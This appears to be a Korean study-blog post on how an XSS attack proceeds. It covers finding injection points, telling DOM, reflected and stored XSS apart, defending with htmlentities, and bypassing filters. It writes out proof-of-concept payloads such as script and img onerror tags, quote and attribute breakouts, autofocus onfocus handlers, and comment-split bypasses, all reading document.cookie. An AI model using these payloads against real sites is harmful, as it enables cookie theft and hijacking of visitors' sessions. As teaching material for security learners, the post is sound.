์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

XSS ๊ณต๊ฒฉ ํ”„๋กœ์„ธ์Šค

  • -
๋ฐ˜์‘ํ˜•
๊ณต๊ฒฉ ๋Œ€์ƒ ํƒ์ƒ‰

<, >, ", document.cookie, <script>

ex) <b> hello world </b>

๊ธ€ ์ž‘์„ฑ ์‹œ ์Šคํฌ๋ฆฝํŠธ ๋™์ž‘์ด ๋˜์ง€ ์•Š๋”๋ผ๋„, ๋‹ค๋ฅธ ํŽ˜์ด์ง€๋ฅผ ํ†ตํ•ด์„œ ํ™•์ธ์„ ํ•ด์•ผํ•œ๋‹ค

 

๊ณต๊ฒฉ ๊ธฐ๋ฒ• ํŒŒ์•…

DOM based : ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์ด ๋ฆฌ์Šคํฐ์ด ๋˜๋Š” ์ฝ”๋“œ์— ๋‚˜์˜ค์ง€ ์•Š๋Š”๋‹ค

Reflected Based : ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์ด ๋ฆฌ์Šคํฐ์ด ๋˜๋Š” ์ฝ”๋“œ์— ํ•จ๊ป˜ ํฌํ•จ๋œ๋‹ค

Stored based : ์ถœ๋ ฅ ํฌ์ง€์…˜ ๋ฐ ์ธ์ฝ”๋”ฉ ์œ„์น˜ ํŒŒ์•…, ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์— ์ €์žฅ๋ผ์žˆ๋Š”๊ฑธ ๋ถˆ๋Ÿฌ์˜จ๋‹ค

 

๊ณต๊ฒฉ ์‹œ๋„

XSS ๊ณต๊ฒฉ ๊ธฐ๋ฐ˜์œผ๋กœ ์‹œ๋‚˜๋ฆฌ์˜ค ์ž‘์„ฑ

<script>alert(document.cookie)</script>

DOM Based ๊ณต๊ฒฉ์— ์‚ฌ์šฉ๋˜๋Š” ๊ตฌ๋ฌธ

<script></script> ๊ตฌ๋ฌธ ์‚ฌ์ด์—์„œ ์‚ฌ์šฉ๋˜๋Š” ๊ธฐ๋Šฅ

document.write()

document.writeln()

document.URL

Element.innerHTML       

<img src=# onerror=>

 

Stored์—์„œ ์ถœ๋ ฅ ํฌ์ง€์…˜ ํŒŒ์•…

 

์ „์œ„ ์ฒ˜๋ฆฌ๋ฐฉ์‹ vs ํ›„์œ„ ์ฒ˜๋ฆฌ๋ฐฉ์‹

title ( ์ „์œ„ ์ฒ˜๋ฆฌ ๋ฐฉ์‹ ) , content ( ํ›„์œ„ ์ฒ˜๋ฆฌ ๋ฐฉ์‹)

(์‚ฌ์šฉ์ž) → ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ → html → insert → DATABASE

์ „์œ„ ์ฒ˜๋ฆฌ : INSERT๊ฐ€ ๋˜๊ธฐ ์ „์— HTMLentities ์ธ์ฝ”๋”ฉ์„ ํ†ตํ•ด์„œ ์Šคํฌ๋ฆฝํŠธ ๋ฐฉ์ง€

ํƒ€์ดํ‹€ ๊ฐ™์ด ๋‹ค์–‘ํ•œ root์—์„œ ๋ณผ ์ˆ˜ ์žˆ์„ ๋•Œ ์ „์ฒ˜๋ฆฌ๊ฐ€ ๋งž๋‹ค

( ex - home์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋Š” ํƒ€์ดํ‹€, board์—์„œ ๋ณผ ์ˆ˜ ์žˆ๋Š” ํƒ€์ดํ‹€)

# action.php
$content = htmlentities($db_conn->real_escape_string($_POST["content"]));

vs

(์‚ฌ์šฉ์ž) → ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’ → html → insert → DATABASE = SELECT html entities

ํ›„์œ„ ์ฒ˜๋ฆฌ : SELECT๊ฐ€ ๋˜๊ธฐ ์ „์— HTMLentities ์ธ์ฝ”๋”ฉ์„ ํ†ตํ•ด์„œ ์Šคํฌ๋ฆฝํŠธ ๋ฐฉ์ง€

์ปจํ…์ธ  ๊ฐ™์ด root๊ฐ€ ๋‹ค์–‘ํ•œ๋ฐ ๊ฒฐ๊ณผ์ ์œผ๋กœ ํ•œํŽ˜์ด์ง€์— ๋ณด์ผ ๋•Œ ํ›„์ฒ˜๋ฆฌ๊ฐ€ ๋งž๋‹ค

# view.php
<td><?=htmlentities($row["content"])?></td>

 

๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€ ํŒŒ์•…

๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋Š” ์‹ ์†ํ•˜๊ฒŒ ํŒŒ์•…ํ•ด์•ผํ•œ๋‹ค

๊ณต๊ฒฉ ์„ฑ๊ณต ์œ ๋ฌด๋ฅผ ๊ฒฐ์ •ํ•œ๋‹ค

<script>alert(document.cookie)</script> # -> o ๋ 

<script>alert(document.cookie)</script>

์•ˆ๋  ๋•Œ

์ˆ˜์ • ํŽ˜์ด์ง€ ์ด์šฉ , Stored based ๊ธฐ์ค€์œผ๋กœ ์ถœ๋ ฅ ํฌ์ง€์…˜์— ๋”ฐ๋ผ์„œ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋„ ํŒ๋‹จ

 

ํ˜•ํƒœ ๋ถ„์„

1.<body> ํƒœ๊ทธ ์•ˆ์— ๋“ค์–ด๊ฐˆ ๊ฒฝ์šฐ

<body> [์ด๊ณณ์— ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ž…๋ ฅ] </body>

> ๊บฝ์‡ ๋ฌธ์ž(<,>) ์‚ฌ์šฉ์ด ๋ฐ˜๋“œ์‹œ ํ•„์š”ํ•˜๋‹ค

<b> ํƒœ๊ทธ๋ฅผ ๋„ฃ์–ด์„œ ๋ณผ๋“œ์ฒด๊ฐ€ ๋‚˜์˜ค๋ฉด ๊บฝ์‡  ์‚ฌ์šฉ ๊ฐ€๋Šฅ

 

2.<script> ํƒœ๊ทธ ์•ˆ์— ๋“ค์–ด๊ฐˆ ๊ฒฝ์šฐ

<script> [์ด๊ณณ์— ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ž…๋ ฅ] </script>

<script> var keyword = "[์ด๊ณณ์— ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์ž…๋ ฅ]"; </script>

์Šคํฌ๋ฆฝํŠธ = " alert(document.cookie); //

<script> var keyword = " " alert(document.cookie); // "; </script>
<script> var keyword = "</script><script>alert(document.cookie)//"; </script>

์Œ ๋”ฐ์˜ดํ‘œ(") ์‚ฌ์šฉ์ด ๋ฐ˜๋“œ์‹œ ํ•„์š”ํ•˜๋‹ค

 

3. <input> ํƒœ๊ทธ ์•ˆ์— ๋“ค์–ด๊ฐˆ ๊ฒฝ์šฐ

<input type="text" name="keyword" value="[์ด๊ณณ์— ์Šคํฌ๋ฆฝํŠธ ์ž…๋ ฅ]">

์Šคํฌ๋ฆฝํŠธ = ><script> alert(document.cookie) </script>

<input type="text" name="keyword" value="><script>alert(document.cookie)</script>">

๊บฝ์‡ ๋ฌธ์ž(<,>), ์Œ๋”ฐ์˜ดํ‘œ(") ๋ฐ˜๋“œ์‹œ ํ•„์š”

 

1๋ฒˆ์˜ ๊ฒฝ์šฐ <b> ํƒœ๊ทธ๋ฅผ ๋„ฃ์–ด์„œ ๋ณผ๋“œ์ฒด๊ฐ€ ๋‚˜์˜ค๋ฉด ๊บฝ์‡  ์‚ฌ์šฉ ๊ฐ€๋Šฅ

<b>test</b> --> ๊ณต๊ฒฉ์ด ๋  ์ˆ˜ ์—†๋‹ค

 

2๋ฒˆ์˜ ๊ฒฝ์šฐ test " test ๋ฅผ ๋„ฃ์–ด์„œ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ ์—ฌ๋ถ€๋ฅผ ํŒŒ์•…ํ•œ๋‹ค

์Šคํฌ๋ฆฝํŠธ ์•ˆ์—์„œ " ๋ฌธ์ž๊ฐ€ ์•„๋‹ˆ๋ผ &qout ๋กœ ๋‚˜์˜ค๋ฉด ๊ณต๊ฒฉ์ด ๋  ์ˆ˜ ์—†๋‹ค

 

DOM Based์—์„œ ๊บฝ์ƒˆ(<, >)๋ฅผ ์‚ฌ์šฉํ•˜์ง€ ๋ชปํ•  ๊ฒฝ์šฐ

location.href ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•  ๋•Œ๋งŒ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ # --> GET์œผ๋กœ ์ „์†ก ํ•  ๋•Œ

์ฃผ์†Œindex.php#?var1=test1&var2=test2

http://192.168.0.200/xss/example3.php?keyword=<img src=x onerror=alert('test')>

http://192.168.0.200/xss/example3.php#keyword=<img src=x onerror=alert('test')>

 

๊ฒ€์ฆ ๋กœ์ง ๋ถ„์„

htmlentities() ํ•จ์ˆ˜๋ฅผ ์ด์šฉํ•œ ๊ฒ€์ฆ ๋กœ์ง

<script></script> ์ด ๊ตฌ๋ฌธ์„ ๋„ฃ์„ ๋•Œ ์„ฑ๊ณต / ์‹คํŒจ

 

์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’

1. ๊ฒ€์ฆ ๋กœ์ง์ด ์กด์žฌ

1-1 HTML tag ์‚ฌ์šฉ์ด ๊ฐ€๋Šฅํ•œ

- ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค

- ๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ๋ฅผ ์‚ฌ์šฉํ•œ๋‹ค

1-2 HTML tag ์‚ฌ์šฉ์ด ๋ถˆ๊ฐ€๋Šฅ

- HTML entity encoding

 

2. ๊ฒ€์ฆ ๋กœ์ง์ด ์กด์žฌํ•˜์ง€ ์•Š์Œ

> ๋

 

ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ์™€ ๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ ํŒ๋ณ„

๋ธ”๋ž™ ๋ฆฌ์ŠคํŠธ : ํŠน์ • ํŒจํ„ด๋งŒ ์ œ์™ธํ•˜๊ณ  ๋‚˜๋จธ์ง€ ALL ํ—ˆ์šฉ

ํ™”์ดํŠธ ๋ฆฌ์ŠคํŠธ : ํŠน์ • ํŒจํ„ด๋งŒ ํ—ˆ์šฉํ•˜๊ณ  ๋‚˜๋จธ์ง€ ALL ๊ฑฐ๋ถ€

<b>,<h1> ... ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๊ฐ„๋‹จํ•œ ํƒœ๊ทธ๋“ค์€ ์ „๋ถ€ ์ธ์šฉํ•ด๋ณธ๋‹ค

<test> ์ด๋ ‡๊ฒŒ ์‚ฌ์šฉํ•ด ๋ณธ๋‹ค = &lt;test&gt; : htmlentity encoding 

<test> ํƒœ๊ทธ๋ฅผ ์‚ฌ์šฉํ–ˆ์„ ๋•Œ ์„ฑ๊ณตํ•œ๋‹ค : ๊ณต๊ฒฉ ๊ฐ€๋Šฅ์„ฑ์ด ์ถฉ๋ถ„ํžˆ ์กด์žฌ

te''st ์‚ฌ์šฉํ•ด ๋ณธ๋‹ค : te&quot;st : htmlentity encoding

te''st๊ฐ€ ์ •์ƒ์ ์œผ๋กœ ์ถœ๋ ฅ์ด ๋˜๋ฉด ์Šคํฌ๋ฆฝํŠธ ํƒœ๊ทธ ๋‚ด์—์„œ ์šฐํšŒ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๋‹ค

 

๋ฆฌ์Šคํฐ๊ฐ’์—์„œ[<, >, "]๊ธฐํ˜ธ๋“ค์ด [&gt; / &lt; / &quot] ๊ฐ’์œผ๋กœ ํ‘œํ˜„์ด ๋˜๋ฉด

htmlentitiy encoding ์ด ๋˜์–ด์žˆ๋‹ค > ๊ณต๊ฒฉ ์‹คํŒจ

 

์ฃผ์„/๊ฐœํ–‰/๊ณต๋ฐฑ ๋“ฑ์„ ํ™œ์šฉํ•œ ์šฐํšŒ

ex) alert(document.cookie)์ด ๋ฌธ์ž์—ด์„ ํ•„ํ„ฐ๋ง

alert/**/(document.cookie)

alert(document/**/.cookie)

alert(document/**/./**/cookie)

alert(docu/**/ment.cookie) > ์•ˆ๋จ

 

์ •์ƒ์ ์œผ๋กœ ์ž˜ ์ž‘๋™ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธ

1
<b>test</b>

์‚ฌ์šฉ ๊ฐ€๋Šฅ

2
<script>alert(document.cookie)</script>

 

์‚ฌ์šฉ ๋ถˆ๊ฐ€๋Šฅ

alert์ด ๋ง‰ํ˜€์žˆ๋Š”์ง€ script๊ฐ€ ๋ง‰ํ˜€์žˆ๋Š”์ง€ ๋ชจ๋ฅด๊ธฐ ๋•Œ๋ฌธ์— 

<b>alert(document.cookie)</b> ๋ฅผ ํ™•์ธํ–ˆ์„๋•Œ ์‚ฌ์šฉ ๊ฐ€๋Šฅ

alert ๋Œ€์ฒด ๊ฐ€๋Šฅ ๋ฌธ๊ตฌ

confirm , prompt

 

 

3
<input type="text" name="keyword" value="๊ฐ’">

<input type="text" name="keyword" value=" " <script> alert (document.cookie)</script">

 

inputํƒœ๊ทธ์— ๋‚ด๊ฐ€ XSS ๊ณต๊ฒฉ์„ ํ•˜๋ ค๋ฉด ", <, > ์‚ฌ์šฉ์ด ๊ฐ€๋Šฅํ•ด์•ผ ํ•œ๋‹ค

 

<input type="text" name="keyword" value="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;">

- HTML entitiy encoding ๋ผ ์žˆ๋Š” ๊ฒƒ

 

onfocus ์ด๋ฒคํŠธ ํ•ธ๋“ค๋Ÿฌ๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด HTML entities encoding์„ ํšŒํ”ผํ•  ์ˆ˜ ์žˆ๋‹ค.

onFocus : ์ปค์„œ๊ฐ€ ์œ„์น˜ํ•  ๋•Œ ๋ฐœ์ƒํ•˜๋Š” ์ด๋ฒคํŠธ

<input type="text" name="keyword" value="autofocus onfocus="alert(document.cookie)" >

ํ•ด๋‹น ํŒ์—…์ฐฝ ํ™•์ธ

" autofocus onfocus="alert(document.cookie)

 

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SESSION High jacking  (0) 2022.07.14
XSS ์šฐํšŒ ๊ณต๊ฒฉ  (0) 2022.07.14
XSS - Cross Site Script  (0) 2022.07.12
Secure coding  (0) 2022.07.12
SQL Injection ์‹ค์Šต  (0) 2022.07.08
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.